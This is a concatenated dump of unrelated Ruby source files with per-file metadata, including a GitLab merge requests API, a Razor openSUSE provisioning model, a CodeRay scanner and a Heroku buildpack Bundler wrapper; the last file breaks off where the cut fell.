1a9210a7ae6faf9ca7a8d6b4206af6d7f9f783b2 | 1,178 | # rubocop:disable Metrics/LineLength
# == Schema Information
#
# Table name: reports
#
# id :integer not null, primary key
# explanation :text
# naughty_type :string not null, indexed => [naughty_id]
# reason :integer not null
# status :integer default(0), not null, indexed
# created_at :datetime not null
# updated_at :datetime not null
# moderator_id :integer
# naughty_id :integer not null, indexed => [user_id], indexed => [naughty_type]
# user_id :integer not null, indexed => [naughty_id]
#
# Indexes
#
# index_reports_on_naughty_id_and_user_id (naughty_id,user_id) UNIQUE
# index_reports_on_naughty_type_and_naughty_id (naughty_type,naughty_id)
# index_reports_on_status (status)
#
# Foreign Keys
#
# fk_rails_c7699d537d (user_id => users.id)
# fk_rails_cfe003e081 (moderator_id => users.id)
#
# rubocop:enable Metrics/LineLength
FactoryBot.define do
factory :report do
association :naughty, factory: :post, strategy: :build
association :user, factory: :user, strategy: :build
reason { :nsfw }
end
end
| 31.837838 | 91 | 0.655348 |
e92d348550bc8e717a735d43d6922bfcedfc1299 | 1,640 | require File.expand_path("../../../../spec_helper", __FILE__)
describe Pod::Generator::Markdown do
before do
@file_accessor = fixture_file_accessor('banana-lib/BananaLib.podspec')
@spec = @file_accessor.spec
@generator = Pod::Generator::Markdown.new([@file_accessor])
@spec.stubs(:name).returns("POD_NAME")
@generator.stubs(:license_text).returns("LICENSE_TEXT")
end
it "returns a correctly formatted title string" do
@generator.title_from_string("A Title", 2).should.equal "## A Title"
end
it "returns a correctly formatted license string for each pod" do
@generator.string_for_spec(@spec).should.equal "\n## POD_NAME\n\nLICENSE_TEXT\n"
end
it "returns a correctly formatted markdown string for the target" do
@generator.stubs(:header_title).returns("HEADER_TITLE")
@generator.stubs(:header_text).returns("HEADER_TEXT")
@generator.stubs(:footnote_title).returns("") # Test that extra \n isn't added for empty strings
@generator.stubs(:footnote_text).returns("FOOTNOTE_TEXT")
@generator.licenses.should.equal "# HEADER_TITLE\nHEADER_TEXT\n\n## POD_NAME\n\nLICENSE_TEXT\nFOOTNOTE_TEXT\n"
end
it "writes a markdown file to disk" do
basepath = config.sandbox.root + "Pods-acknowledgements"
given_path = @generator.class.path_from_basepath(basepath)
expected_path = config.sandbox.root + "Pods-acknowledgements.markdown"
mockFile = mock
mockFile.expects(:write).with(equals(@generator.licenses))
mockFile.expects(:close)
File.expects(:new).with(equals(expected_path), equals("w")).returns(mockFile)
@generator.save_as(given_path)
end
end
| 41 | 114 | 0.733537 |
26c059ed3c29ab1730d3849e331a60d8514f4d97 | 9,213 | require "erb"
# Root ProjectRazor namespace
module ProjectRazor
module ModelTemplate
# Root Model object
# @abstract
class Opensuse12 < ProjectRazor::ModelTemplate::Base
include(ProjectRazor::Logging)
# Assigned image
attr_accessor :image_uuid
# Metadata
attr_accessor :hostname
# Compatible Image Prefix
attr_accessor :image_prefix
def initialize(hash)
super(hash)
# Static config
@hidden = false
@template = :linux_deploy
@name = "opensuse_12"
@description = "OpenSuSE Suse 12 Model"
# Metadata vars
@hostname_prefix = nil
# State / must have a starting state
@current_state = :init
# Image UUID
@image_uuid = true
# Image prefix we can attach
@image_prefix = "os"
# Enable agent brokers for this model
@broker_plugin = :agent
@osversion = 12
@final_state = :os_complete
from_hash(hash) unless hash == nil
@req_metadata_hash = {
"@hostname_prefix" => {
:default => "node",
:example => "node",
:validation => '^[\w]+$',
:required => true,
:description => "node hostname prefix (will append node number)"
},
"@root_password" => {
:default => "test1234",
:example => "P@ssword!",
:validation => '^[\S]{8,}',
:required => true,
:description => "root password (> 8 characters)"
},
}
end
def callback
{ "yast" => :yast_call,
"postinstall" => :postinstall_call, }
end
def broker_agent_handoff
logger.debug "Broker agent called for: #{@broker.name}"
unless @node_ip
logger.error "Node IP address isn't known"
@current_state = :broker_fail
broker_fsm_log
end
options = {
:username => "root",
:password => @root_password,
:metadata => node_metadata,
:uuid => @node.uuid,
:ipaddress => @node_ip,
}
@current_state = @broker.agent_hand_off(options)
broker_fsm_log
end
def yast_call
@arg = @args_array.shift
case @arg
when "start"
@result = "Acknowledged yast read"
fsm_action(:yast_start, :yast)
return "ok"
when "end"
@result = "Acknowledged yast end"
fsm_action(:yast_end, :yast)
return "ok"
when "file"
@result = "Replied with yast file"
fsm_action(:yast_file, :yast)
return generate_yast(@policy_uuid)
else
return "error"
end
end
def postinstall_call
@arg = @args_array.shift
case @arg
when "inject"
fsm_action(:postinstall_inject, :postinstall)
return os_boot_script(@policy_uuid)
when "boot"
fsm_action(:os_boot, :postinstall)
return os_complete_script(@node)
when "source_fix"
fsm_action(:source_fix, :postinstall)
return
when "send_ips"
#fsm_action(:source_fix, :postinstall)
# Grab IP string
@ip_string = @args_array.shift
logger.debug "Node IP String: #{@ip_string}"
@node_ip = @ip_string if @ip_string =~ /\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b/
return
else
fsm_action(@arg.to_sym, :postinstall)
return
end
end
# Defines our FSM for this model
# For state => {action => state, ..}
def fsm_tree
{
:init => {
:mk_call => :init,
:boot_call => :init,
:yast_start => :preinstall,
:yast_file => :init,
:yast_end => :postinstall,
:timeout => :timeout_error,
:error => :error_catch,
:else => :init
},
:preinstall => {
:mk_call => :preinstall,
:boot_call => :preinstall,
:yast_start => :preinstall,
:yast_file => :init,
:yast_end => :postinstall,
:yast_timeout => :timeout_error,
:error => :error_catch,
:else => :preinstall
},
:postinstall => {
:mk_call => :postinstall,
:boot_call => :postinstall,
:yast_end => :postinstall,
:source_fix => :postinstall,
:apt_get_update => :postinstall,
:apt_get_upgrade => :postinstall,
:apt_get_ruby => :postinstall,
:postinstall_inject => :postinstall,
:os_boot => :os_complete,
:post_error => :error_catch,
:post_timeout => :timeout_error,
:error => :error_catch,
:else => :postinstall
},
:os_complete => {
:mk_call => :os_complete,
:boot_call => :os_complete,
:else => :os_complete,
:reset => :init
},
:timeout_error => {
:mk_call => :timeout_error,
:boot_call => :timeout_error,
:else => :timeout_error,
:reset => :init
},
:error_catch => {
:mk_call => :error_catch,
:boot_call => :error_catch,
:else => :error_catch,
:reset => :init
},
}
end
def mk_call(node, policy_uuid)
super(node, policy_uuid)
case @current_state
# We need to reboot
when :init, :preinstall, :postinstall, :os_validate, :os_complete, :broker_check, :broker_fail, :broker_success
ret = [:reboot, {}]
when :timeout_error, :error_catch
ret = [:acknowledge, {}]
else
ret = [:acknowledge, {}]
end
fsm_action(:mk_call, :mk_call)
ret
end
def boot_call(node, policy_uuid)
super(node, policy_uuid)
case @current_state
when :init, :preinstall
@result = "Starting Suse model install"
ret = start_install(node, policy_uuid)
when :postinstall, :os_complete, :broker_check, :broker_fail, :broker_success, :complete_no_broker
ret = local_boot(node)
when :timeout_error, :error_catch
engine = ProjectRazor::Engine.instance
ret = engine.default_mk_boot(node.uuid)
else
engine = ProjectRazor::Engine.instance
ret = engine.default_mk_boot(node.uuid)
end
fsm_action(:boot_call, :boot_call)
ret
end
# ERB.result(binding) is failing in Ruby 1.9.2 and 1.9.3 so template is processed in the def block.
def template_filepath(filename)
raise ProjectRazor::Error::Slice::InternalError, "must provide suse version." unless @osversion
filepath = File.join(File.dirname(__FILE__), "suse/#{@osversion}/#{filename}.erb")
end
def os_boot_script(policy_uuid)
@result = "Replied with os boot script"
filepath = template_filepath('os_boot')
ERB.new(File.read(filepath)).result(binding)
end
def os_complete_script(node)
@result = "Replied with os complete script"
filepath = template_filepath('os_complete')
ERB.new(File.read(filepath)).result(binding)
end
def start_install(node, policy_uuid)
filepath = template_filepath('boot_install')
ERB.new(File.read(filepath)).result(binding)
end
def local_boot(node)
filepath = template_filepath('boot_local')
ERB.new(File.read(filepath)).result(binding)
end
def kernel_args(policy_uuid)
filepath = template_filepath('kernel_args')
ERB.new(File.read(filepath)).result(binding)
end
def hostname
"#{@hostname_prefix}#{@counter.to_s}"
end
def kernel_path
"boot/x86_64/loader/linux"
end
def initrd_path
"boot/x86_64/loader/initrd"
end
def config
get_data.config
end
def image_svc_uri
"http://#{config.image_svc_host}:#{config.image_svc_port}/razor/image/os"
end
def api_svc_uri
"http://#{config.image_svc_host}:#{config.api_port}/razor/api"
end
def generate_yast(policy_uuid)
# TODO: Review hostname
hostname = "#{@hostname_prefix}#{@counter.to_s}"
filepath = template_filepath('autoyast')
ERB.new(File.read(filepath)).result(binding)
end
end
end
end
| 32.326316 | 121 | 0.511668 |
7a21354cfc45af7e44b2c9674d2091a8beb6d74c | 1,610 | module CodeRay
module Scanners
# = Debug Scanner
#
# Parses the output of the Encoders::Debug encoder.
class Raydebug < Scanner
register_for :raydebug
file_extension 'raydebug'
title 'CodeRay Token Dump'
protected
def scan_tokens encoder, options
opened_tokens = []
until eos?
if match = scan(/\s+/)
encoder.text_token match, :space
elsif match = scan(/ (\w+) \( ( [^\)\\]* ( \\. [^\)\\]* )* ) /x)
kind = self[1]
encoder.text_token kind, :class
encoder.text_token '(', :operator
match = self[2]
encoder.text_token match, kind.to_sym
encoder.text_token match, :operator if match = scan(/\)/)
elsif match = scan(/ (\w+) ([<\[]) /x)
kind = self[1]
case self[2]
when '<'
encoder.text_token kind, :class
when '['
encoder.text_token kind, :class
else
raise 'CodeRay bug: This case should not be reached.'
end
kind = kind.to_sym
opened_tokens << kind
encoder.begin_group kind
encoder.text_token self[2], :operator
elsif !opened_tokens.empty? && match = scan(/ [>\]] /x)
encoder.text_token match, :operator
encoder.end_group opened_tokens.pop
else
encoder.text_token getch, :space
end
end
encoder.end_group opened_tokens.pop until opened_tokens.empty?
encoder
end
end
end
end
| 24.029851 | 72 | 0.527329 |
fff99a1d31b5a9c1f0b7065825a6cc35adef8993 | 5,833 | $: << File.expand_path(File.dirname(__FILE__))
module QA
##
# GitLab QA runtime classes, mostly singletons.
#
module Runtime
autoload :Release, 'qa/runtime/release'
autoload :User, 'qa/runtime/user'
autoload :Namespace, 'qa/runtime/namespace'
autoload :Scenario, 'qa/runtime/scenario'
autoload :Browser, 'qa/runtime/browser'
autoload :Env, 'qa/runtime/env'
autoload :RSAKey, 'qa/runtime/rsa_key'
autoload :Address, 'qa/runtime/address'
autoload :API, 'qa/runtime/api'
end
##
# GitLab QA fabrication mechanisms
#
module Factory
autoload :Base, 'qa/factory/base'
autoload :Dependency, 'qa/factory/dependency'
autoload :Product, 'qa/factory/product'
module Resource
autoload :Sandbox, 'qa/factory/resource/sandbox'
autoload :Group, 'qa/factory/resource/group'
autoload :Issue, 'qa/factory/resource/issue'
autoload :Project, 'qa/factory/resource/project'
autoload :MergeRequest, 'qa/factory/resource/merge_request'
autoload :DeployKey, 'qa/factory/resource/deploy_key'
autoload :Branch, 'qa/factory/resource/branch'
autoload :SecretVariable, 'qa/factory/resource/secret_variable'
autoload :Runner, 'qa/factory/resource/runner'
autoload :PersonalAccessToken, 'qa/factory/resource/personal_access_token'
end
module Repository
autoload :Push, 'qa/factory/repository/push'
end
module Settings
autoload :HashedStorage, 'qa/factory/settings/hashed_storage'
end
end
##
# GitLab QA Scenarios
#
module Scenario
##
# Support files
#
autoload :Bootable, 'qa/scenario/bootable'
autoload :Actable, 'qa/scenario/actable'
autoload :Taggable, 'qa/scenario/taggable'
autoload :Template, 'qa/scenario/template'
##
# Test scenario entrypoints.
#
module Test
autoload :Instance, 'qa/scenario/test/instance'
module Integration
autoload :LDAP, 'qa/scenario/test/integration/ldap'
autoload :Mattermost, 'qa/scenario/test/integration/mattermost'
end
module Sanity
autoload :Selectors, 'qa/scenario/test/sanity/selectors'
end
end
end
##
# Classes describing structure of GitLab, pages, menus etc.
#
# Needed to execute click-driven-only black-box tests.
#
module Page
autoload :Base, 'qa/page/base'
autoload :View, 'qa/page/view'
autoload :Element, 'qa/page/element'
autoload :Validator, 'qa/page/validator'
module Main
autoload :Login, 'qa/page/main/login'
autoload :OAuth, 'qa/page/main/oauth'
end
module Settings
autoload :Common, 'qa/page/settings/common'
end
module Menu
autoload :Main, 'qa/page/menu/main'
autoload :Side, 'qa/page/menu/side'
autoload :Admin, 'qa/page/menu/admin'
autoload :Profile, 'qa/page/menu/profile'
end
module Dashboard
autoload :Projects, 'qa/page/dashboard/projects'
autoload :Groups, 'qa/page/dashboard/groups'
end
module Group
autoload :New, 'qa/page/group/new'
autoload :Show, 'qa/page/group/show'
end
module Project
autoload :New, 'qa/page/project/new'
autoload :Show, 'qa/page/project/show'
autoload :Activity, 'qa/page/project/activity'
module Pipeline
autoload :Index, 'qa/page/project/pipeline/index'
autoload :Show, 'qa/page/project/pipeline/show'
end
module Job
autoload :Show, 'qa/page/project/job/show'
end
module Settings
autoload :Common, 'qa/page/project/settings/common'
autoload :Advanced, 'qa/page/project/settings/advanced'
autoload :Main, 'qa/page/project/settings/main'
autoload :Repository, 'qa/page/project/settings/repository'
autoload :CICD, 'qa/page/project/settings/ci_cd'
autoload :DeployKeys, 'qa/page/project/settings/deploy_keys'
autoload :ProtectedBranches, 'qa/page/project/settings/protected_branches'
autoload :SecretVariables, 'qa/page/project/settings/secret_variables'
autoload :Runners, 'qa/page/project/settings/runners'
autoload :MergeRequest, 'qa/page/project/settings/merge_request'
end
module Issue
autoload :New, 'qa/page/project/issue/new'
autoload :Show, 'qa/page/project/issue/show'
autoload :Index, 'qa/page/project/issue/index'
end
end
module Profile
autoload :PersonalAccessTokens, 'qa/page/profile/personal_access_tokens'
end
module MergeRequest
autoload :New, 'qa/page/merge_request/new'
autoload :Show, 'qa/page/merge_request/show'
end
module Admin
module Settings
autoload :RepositoryStorage, 'qa/page/admin/settings/repository_storage'
autoload :Main, 'qa/page/admin/settings/main'
end
end
module Mattermost
autoload :Main, 'qa/page/mattermost/main'
autoload :Login, 'qa/page/mattermost/login'
end
##
# Classes describing components that are used by several pages.
#
module Component
autoload :Dropzone, 'qa/page/component/dropzone'
end
end
##
# Classes describing operations on Git repositories.
#
module Git
autoload :Repository, 'qa/git/repository'
autoload :Location, 'qa/git/location'
end
##
# Classes describing services being part of GitLab and how we can interact
# with these services, like through the shell.
#
module Service
autoload :Shellout, 'qa/service/shellout'
autoload :Omnibus, 'qa/service/omnibus'
autoload :Runner, 'qa/service/runner'
end
##
# Classes that make it possible to execute features tests.
#
module Specs
autoload :Config, 'qa/specs/config'
autoload :Runner, 'qa/specs/runner'
end
end
QA::Runtime::Release.extend_autoloads!
| 28.315534 | 82 | 0.674439 |
212b2cb949d07bb5e5545a66543d2c5c613710a9 | 1,322 | require 'mongo_doc'
class Address
include MongoDoc::Document
attr_accessor :street
attr_accessor :city
attr_accessor :state
attr_accessor :zip_code
attr_accessor :phone_number
end
class Contact
include MongoDoc::Document
attr_accessor :name
attr_accessor :interests
embed_many :addresses
scope :in_state, lambda {|state| where('addresses.state' => state)}
end
Contact.collection.drop
contact = Contact.new(:name => 'Hashrocket', :interests => ['ruby', 'rails', 'agile'])
contact.addresses << Address.new(:street => '320 1st Street North, #712', :city => 'Jacksonville Beach', :state => 'FL', :zip_code => '32250', :phone_number => '877 885 8846')
contact.save
# Finders
Contact.find_all.each {|c| puts c.name}
puts contact.to_param
puts Contact.find_one(contact.to_param).addresses.first.street
Contact.find(contact.to_param).each {|c| puts c.name}
hashrocket_in_fl = Contact.in_state('FL').where(:name => /rocket/)
hashrocket_address = hashrocket_in_fl.first.addresses.first
hashrocket_address.update_attributes(:street => '320 First Street North, #712')
puts Contact.where(:name => 'Hashrocket').first.addresses.first.street
# Criteria behave like new AR3 AREL queries
hr = Contact.where(:name => 'Hashrocket')
hr_in = hr.where('addresses.state' => 'IN')
puts hr.count
puts hr_in.count
| 28.12766 | 175 | 0.74357 |
334af36a2b7b24ba417d2b6411a1bdf3c50c86f1 | 1,197 | module VanillaIse
class EndpointGroup < Object
def self.all(page_size: 100, page_limit: Float::INFINITY)
Base.make_api_call(
'/config/endpointgroup',
:get,
page_size: page_size,
page_limit: page_limit,
).collect { |group| self.new(group) }
end
def self.search(filters, page_size: 100, page_limit: Float::INFINITY, fetch: true)
raise ArgumentError 'No filters provided' if filters.empty?
Base.disable_rails_query_string_format
params = Filter.parse(filters)
params[:filtertype] = 'or'
results = []
response = Base.make_api_call(
'/config/endpointgroup',
:get,
query_params: params,
page_size: page_size,
page_limit: page_limit,
)
if fetch
Async do |task|
response.each do |group|
task.async { results << self.find(group['id']) }
end
end
else
response.each { |group| results << new(group['id']) }
end
results
end
def self.find(id)
new Base.make_api_call(
"/config/endpointgroup/#{id}",
:get,
)&.dig('EndPointGroup')
end
end
end | 26.021739 | 86 | 0.583124 |
5d1fe22f2dff68597fa1bc08850479f2bb3ee2f9 | 12,076 | module API
class MergeRequests < Grape::API
include PaginationParams
DEPRECATION_MESSAGE = 'This endpoint is deprecated and will be removed in GitLab 9.0.'.freeze
before { authenticate! }
params do
requires :id, type: String, desc: 'The ID of a project'
end
resource :projects do
helpers do
def handle_merge_request_errors!(errors)
if errors[:project_access].any?
error!(errors[:project_access], 422)
elsif errors[:branch_conflict].any?
error!(errors[:branch_conflict], 422)
elsif errors[:validate_fork].any?
error!(errors[:validate_fork], 422)
elsif errors[:validate_branches].any?
conflict!(errors[:validate_branches])
end
render_api_error!(errors, 400)
end
params :optional_params do
optional :description, type: String, desc: 'The description of the merge request'
optional :assignee_id, type: Integer, desc: 'The ID of a user to assign the merge request'
optional :milestone_id, type: Integer, desc: 'The ID of a milestone to assign the merge request'
optional :labels, type: String, desc: 'Comma-separated list of label names'
optional :remove_source_branch, type: Boolean, desc: 'Remove source branch when merging'
end
end
desc 'List merge requests' do
success Entities::MergeRequest
end
params do
optional :state, type: String, values: %w[opened closed merged all], default: 'all',
desc: 'Return opened, closed, merged, or all merge requests'
optional :order_by, type: String, values: %w[created_at updated_at], default: 'created_at',
desc: 'Return merge requests ordered by `created_at` or `updated_at` fields.'
optional :sort, type: String, values: %w[asc desc], default: 'desc',
desc: 'Return merge requests sorted in `asc` or `desc` order.'
optional :iid, type: Array[Integer], desc: 'The IID of the merge requests'
use :pagination
end
get ":id/merge_requests" do
authorize! :read_merge_request, user_project
merge_requests = user_project.merge_requests.inc_notes_with_associations
merge_requests = filter_by_iid(merge_requests, params[:iid]) if params[:iid].present?
merge_requests =
case params[:state]
when 'opened' then merge_requests.opened
when 'closed' then merge_requests.closed
when 'merged' then merge_requests.merged
else merge_requests
end
merge_requests = merge_requests.reorder(params[:order_by] => params[:sort])
present paginate(merge_requests), with: Entities::MergeRequest, current_user: current_user, project: user_project
end
desc 'Create a merge request' do
success Entities::MergeRequest
end
params do
requires :title, type: String, desc: 'The title of the merge request'
requires :source_branch, type: String, desc: 'The source branch'
requires :target_branch, type: String, desc: 'The target branch'
optional :target_project_id, type: Integer,
desc: 'The target project of the merge request defaults to the :id of the project'
use :optional_params
end
post ":id/merge_requests" do
authorize! :create_merge_request, user_project
mr_params = declared_params(include_missing: false)
mr_params[:force_remove_source_branch] = mr_params.delete(:remove_source_branch) if mr_params[:remove_source_branch].present?
merge_request = ::MergeRequests::CreateService.new(user_project, current_user, mr_params).execute
if merge_request.valid?
present merge_request, with: Entities::MergeRequest, current_user: current_user, project: user_project
else
handle_merge_request_errors! merge_request.errors
end
end
desc 'Delete a merge request'
params do
requires :merge_request_id, type: Integer, desc: 'The ID of a merge request'
end
delete ":id/merge_requests/:merge_request_id" do
merge_request = user_project.merge_requests.find_by(id: params[:merge_request_id])
authorize!(:destroy_merge_request, merge_request)
merge_request.destroy
end
# Routing "merge_request/:merge_request_id/..." is DEPRECATED and WILL BE REMOVED in version 9.0
# Use "merge_requests/:merge_request_id/..." instead.
#
params do
requires :merge_request_id, type: Integer, desc: 'The ID of a merge request'
end
{ ":id/merge_request/:merge_request_id" => :deprecated, ":id/merge_requests/:merge_request_id" => :ok }.each do |path, status|
desc 'Get a single merge request' do
if status == :deprecated
detail DEPRECATION_MESSAGE
end
success Entities::MergeRequest
end
get path do
merge_request = user_project.merge_requests.find(params[:merge_request_id])
authorize! :read_merge_request, merge_request
present merge_request, with: Entities::MergeRequest, current_user: current_user, project: user_project
end
desc 'Get the commits of a merge request' do
success Entities::RepoCommit
end
get "#{path}/commits" do
merge_request = user_project.merge_requests.find(params[:merge_request_id])
authorize! :read_merge_request, merge_request
present merge_request.commits, with: Entities::RepoCommit
end
desc 'Show the merge request changes' do
success Entities::MergeRequestChanges
end
get "#{path}/changes" do
merge_request = user_project.merge_requests.find(params[:merge_request_id])
authorize! :read_merge_request, merge_request
present merge_request, with: Entities::MergeRequestChanges, current_user: current_user
end
desc 'Update a merge request' do
success Entities::MergeRequest
end
params do
optional :title, type: String, allow_blank: false, desc: 'The title of the merge request'
optional :target_branch, type: String, allow_blank: false, desc: 'The target branch'
optional :state_event, type: String, values: %w[close reopen merge],
desc: 'Status of the merge request'
use :optional_params
at_least_one_of :title, :target_branch, :description, :assignee_id,
:milestone_id, :labels, :state_event,
:remove_source_branch
end
put path do
merge_request = user_project.merge_requests.find(params.delete(:merge_request_id))
authorize! :update_merge_request, merge_request
mr_params = declared_params(include_missing: false)
mr_params[:force_remove_source_branch] = mr_params.delete(:remove_source_branch) if mr_params[:remove_source_branch].present?
merge_request = ::MergeRequests::UpdateService.new(user_project, current_user, mr_params).execute(merge_request)
if merge_request.valid?
present merge_request, with: Entities::MergeRequest, current_user: current_user, project: user_project
else
handle_merge_request_errors! merge_request.errors
end
end
desc 'Merge a merge request' do
success Entities::MergeRequest
end
params do
optional :merge_commit_message, type: String, desc: 'Custom merge commit message'
optional :should_remove_source_branch, type: Boolean,
desc: 'When true, the source branch will be deleted if possible'
optional :merge_when_build_succeeds, type: Boolean,
desc: 'When true, this merge request will be merged when the pipeline succeeds'
optional :sha, type: String, desc: 'When present, must have the HEAD SHA of the source branch'
end
put "#{path}/merge" do
merge_request = user_project.merge_requests.find(params[:merge_request_id])
# Merge request can not be merged
# because user dont have permissions to push into target branch
unauthorized! unless merge_request.can_be_merged_by?(current_user)
not_allowed! unless merge_request.mergeable_state?
render_api_error!('Branch cannot be merged', 406) unless merge_request.mergeable?
if params[:sha] && merge_request.diff_head_sha != params[:sha]
render_api_error!("SHA does not match HEAD of source branch: #{merge_request.diff_head_sha}", 409)
end
merge_params = {
commit_message: params[:merge_commit_message],
should_remove_source_branch: params[:should_remove_source_branch]
}
if params[:merge_when_build_succeeds] && merge_request.head_pipeline && merge_request.head_pipeline.active?
::MergeRequests::MergeWhenPipelineSucceedsService
.new(merge_request.target_project, current_user, merge_params)
.execute(merge_request)
else
::MergeRequests::MergeService
.new(merge_request.target_project, current_user, merge_params)
.execute(merge_request)
end
present merge_request, with: Entities::MergeRequest, current_user: current_user, project: user_project
end
desc 'Cancel merge if "Merge When Pipeline Succeeds" is enabled' do
success Entities::MergeRequest
end
post "#{path}/cancel_merge_when_build_succeeds" do
merge_request = user_project.merge_requests.find(params[:merge_request_id])
unauthorized! unless merge_request.can_cancel_merge_when_build_succeeds?(current_user)
::MergeRequest::MergeWhenPipelineSucceedsService
.new(merge_request.target_project, current_user)
.cancel(merge_request)
end
desc 'Get the comments of a merge request' do
detail 'Duplicate. DEPRECATED and WILL BE REMOVED in 9.0'
success Entities::MRNote
end
params do
use :pagination
end
get "#{path}/comments" do
merge_request = user_project.merge_requests.find(params[:merge_request_id])
authorize! :read_merge_request, merge_request
present paginate(merge_request.notes.fresh), with: Entities::MRNote
end
desc 'Post a comment to a merge request' do
detail 'Duplicate. DEPRECATED and WILL BE REMOVED in 9.0'
success Entities::MRNote
end
params do
requires :note, type: String, desc: 'The text of the comment'
end
post "#{path}/comments" do
merge_request = user_project.merge_requests.find(params[:merge_request_id])
authorize! :create_note, merge_request
opts = {
note: params[:note],
noteable_type: 'MergeRequest',
noteable_id: merge_request.id
}
note = ::Notes::CreateService.new(user_project, current_user, opts).execute
if note.save
present note, with: Entities::MRNote
else
render_api_error!("Failed to save note #{note.errors.messages}", 400)
end
end
desc 'List issues that will be closed on merge' do
success Entities::MRNote
end
params do
use :pagination
end
get "#{path}/closes_issues" do
merge_request = user_project.merge_requests.find(params[:merge_request_id])
issues = ::Kaminari.paginate_array(merge_request.closes_issues(current_user))
present paginate(issues), with: issue_entity(user_project), current_user: current_user
end
end
end
end
end
| 42.521127 | 135 | 0.648973 |
792dd5fe0ba3f18284057c500c26c1267135b7b8 | 430 | # frozen_string_literal: true
module CacheWithSettings::Helpers
module RenderingHelper
def render(options = {}, locals = {}, &block)
if options.kind_of?(Hash) && options[:cached] == true
options[:cached] = -> object { CacheWithSettings.compose_key(object) }
end
if block_given?
super(options, locals) { yield(block) }
else
super(options, locals)
end
end
end
end
| 23.888889 | 78 | 0.630233 |
7a4e46b37b3526def0906d2af4ce7a578cacfa96 | 6,656 | # frozen_string_literal: true
require 'language_pack/fetcher'
# This class is responsible for installing and maintaining a
# reference to bundler. It contains access to bundler internals
# that are used to introspect a project such as detecting presence
# of gems and their versions.
#
# Example:
#
# bundler = LanguagePack::Helpers::BundlerWrapper.new
# bundler.install
# bundler.version => "1.15.2"
# bundler.dir_name => "bundler-1.15.2"
# bundler.has_gem?("railties") => true
# bundler.gem_version("railties") => "5.2.2"
# bundler.clean
#
# Also used to determine the version of Ruby that a project is using
# based on `bundle platform --ruby`
#
# bundler.ruby_version # => "ruby-2.5.1"
# bundler.clean
#
# IMPORTANT: Calling `BundlerWrapper#install` on this class mutates the environment variable
# ENV['BUNDLE_GEMFILE']. If you're calling in a test context (or anything outside)
# of an isolated dyno, you must call `BundlerWrapper#clean`. To reset the environment
# variable:
#
# bundler = LanguagePack::Helpers::BundlerWrapper.new
# bundler.install
# bundler.clean # <========== IMPORTANT =============
#
class LanguagePack::Helpers::BundlerWrapper
include LanguagePack::ShellHelpers
BLESSED_BUNDLER_VERSIONS = {}
BLESSED_BUNDLER_VERSIONS["1"] = "1.17.3"
BLESSED_BUNDLER_VERSIONS["2"] = "2.0.2"
BUNDLED_WITH_REGEX = /^BUNDLED WITH$(\r?\n) (?<major>\d+)\.\d+\.\d+/m
class GemfileParseError < BuildpackError
def initialize(error)
msg = String.new("There was an error parsing your Gemfile, we cannot continue\n")
msg << error
super msg
end
end
class UnsupportedBundlerVersion < BuildpackError
def initialize(version_hash, major)
msg = String.new("Your Gemfile.lock indicates you need bundler `#{major}.x`\n")
msg << "which is not currently supported. You can deploy with bundler version:\n"
version_hash.keys.each do |v|
msg << " - `#{v}.x`\n"
end
msg << "\nTo use another version of bundler, update your `Gemfile.lock` to point\n"
msg << "to a supported version. For example:\n"
msg << "\n"
msg << "```\n"
msg << "BUNDLED WITH\n"
msg << " #{version_hash["1"]}\n"
msg << "```\n"
super msg
end
end
attr_reader :bundler_path
def initialize(options = {})
@bundler_tmp = Pathname.new(Dir.mktmpdir)
@fetcher = options[:fetcher] || LanguagePack::Fetcher.new(LanguagePack::Base::VENDOR_URL) # coupling
@gemfile_path = options[:gemfile_path] || Pathname.new("./Gemfile")
@gemfile_lock_path = Pathname.new("#{@gemfile_path}.lock")
detect_bundler_version_and_dir_name!
@bundler_path = options[:bundler_path] || @bundler_tmp.join(dir_name)
@bundler_tar = options[:bundler_tar] || "bundler/#{dir_name}.tgz"
@orig_bundle_gemfile = ENV['BUNDLE_GEMFILE']
@path = Pathname.new("#{@bundler_path}/gems/#{dir_name}/lib")
end
def install
ENV['BUNDLE_GEMFILE'] = @gemfile_path.to_s
fetch_bundler
$LOAD_PATH << @path
require "bundler"
self
end
def clean
ENV['BUNDLE_GEMFILE'] = @orig_bundle_gemfile
@bundler_tmp.rmtree if @bundler_tmp.directory?
end
def has_gem?(name)
specs.key?(name)
end
def gem_version(name)
instrument "ruby.gem_version" do
if spec = specs[name]
spec.version
end
end
end
# detects whether the Gemfile.lock contains the Windows platform
# @return [Boolean] true if the Gemfile.lock was created on Windows
def windows_gemfile_lock?
platforms.detect do |platform|
/mingw|mswin/.match(platform.os) if platform.is_a?(Gem::Platform)
end
end
def specs
@specs ||= lockfile_parser.specs.each_with_object({}) {|spec, hash| hash[spec.name] = spec }
end
def platforms
@platforms ||= lockfile_parser.platforms
end
def version
@version
end
def dir_name
"bundler-#{version}"
end
def instrument(*args, &block)
LanguagePack::Instrument.instrument(*args, &block)
end
def ruby_version
instrument 'detect_ruby_version' do
env = { "PATH" => "#{bundler_path}/bin:#{ENV['PATH']}",
"RUBYLIB" => File.join(bundler_path, "gems", dir_name, "lib"),
"GEM_PATH" => "#{bundler_path}:#{ENV["GEM_PATH"]}",
"BUNDLE_DISABLE_VERSION_CHECK" => "true"
}
command = "bundle platform --ruby"
# Silently check for ruby version
output = run_stdout(command, user_env: true, env: env).strip.lines.last
# If there's a gem in the Gemfile (i.e. syntax error) emit error
raise GemfileParseError.new(run("bundle check", user_env: true, env: env)) unless $?.success?
if output.match(/No ruby version specified/)
""
else
output.chomp.sub('(', '').sub(')', '').sub(/(p-?\d+)/, ' \1').split.join('-')
end
end
end
def lockfile_parser
@lockfile_parser ||= parse_gemfile_lock
end
private
def fetch_bundler
instrument 'fetch_bundler' do
return true if Dir.exists?(bundler_path)
topic("Installing bundler #{@version}")
bundler_version_escape_valve!
FileUtils.mkdir_p(bundler_path)
Dir.chdir(bundler_path) do
@fetcher.fetch_untar(@bundler_tar)
end
Dir["bin/*"].each {|path| `chmod 755 #{path}` }
end
end
def parse_gemfile_lock
instrument 'parse_bundle' do
gemfile_contents = File.read(@gemfile_lock_path)
Bundler::LockfileParser.new(gemfile_contents)
end
end
def major_bundler_version
# https://rubular.com/r/jt9yj0aY7fU3hD
bundler_version_match = @gemfile_lock_path.read(mode: "rt").match(BUNDLED_WITH_REGEX)
if bundler_version_match
bundler_version_match[:major]
else
"1"
end
end
# You cannot use Bundler 2.x with a Gemfile.lock that points to a 1.x bundler
# version. The solution here is to read in the value set in the Gemfile.lock
# and download the "blessed" version with the same major version.
def detect_bundler_version_and_dir_name!
major = major_bundler_version
